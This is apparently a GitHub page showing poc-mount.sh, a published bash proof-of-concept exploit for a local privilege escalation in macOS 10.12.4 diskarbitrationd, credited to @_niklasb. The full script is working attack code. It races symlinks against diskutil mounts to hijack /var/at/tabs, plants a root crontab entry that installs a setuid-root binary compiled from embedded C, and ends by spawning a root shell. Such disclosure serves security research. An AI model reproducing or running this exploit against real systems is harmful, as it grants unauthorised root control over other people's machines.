/
poc-mount.sh
executable file
·83 lines (70 loc) · 1.66 KB
/
poc-mount.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
#!/bin/bash
#
# macOS 10.12.4 local privilege escalation exploit by @_niklasb
# https://phoenhex.re/2017-06-09/pwn2own-diskarbitrationd-privesc
if ! security authorize system.volume.internal.mount &>/dev/null; then
echo 2>&1 "Cannot acquire system.volume.internal.mount right. This will not work."
exit 1
fi
TARGET=/private/var/at
SUBDIR=tabs
DISK=/dev/disk0s1
TMPDIR=/tmp/pwn
mkdir -p $TMPDIR
cd $TMPDIR
cat << EOF > boom.c
#include <assert.h>
#include <stdlib.h>
#include <unistd.h>
int main(int argc, char ** argv) {
assert(argc == 2);
setuid(0);
setgid(0);
system(argv[1]);
}
EOF
clang boom.c -o _boom || exit 1
race_link() {
mkdir -p mounts
while true; do
ln -snf mounts link
ln -snf $TARGET link
done
}
race_mount() {
while ! df -h | grep $TARGET >/dev/null; do
while df -h | grep $DISK >/dev/null; do
diskutil umount $DISK &>/dev/null
done
while ! df -h | grep $DISK >/dev/null; do
diskutil mount -mountPoint $TMPDIR/link/$SUBDIR $DISK &>/dev/null
done
done
}
cleanup() {
echo "Killing child process $PID and cleaning up tmp dir"
kill -9 $PID
rm -rf $TMPDIR
}
if df -h | grep $DISK >/dev/null; then
echo 2>&1 "$DISK already mounted. Exiting."
exit 1
fi
race_link &
PID=$!
trap cleanup EXIT
echo "Just imagine having that root shell. It's gonna be legen..."
race_mount
echo "wait for it..."
CMD="cp $TMPDIR/_boom $TMPDIR/boom; chmod u+s $TMPDIR/boom"
rm -f /var/at/tabs/root
echo "* * * * *" "$CMD" > /var/at/tabs/root
while ! [ -e $TMPDIR/boom ]; do
sleep 1
done
echo "dary!"
kill -9 $PID
sleep 0.1
$TMPDIR/boom "rm /var/at/tabs/root"
$TMPDIR/boom "umount -f $DISK"
$TMPDIR/boom "rm -rf $TMPDIR; cd /; su"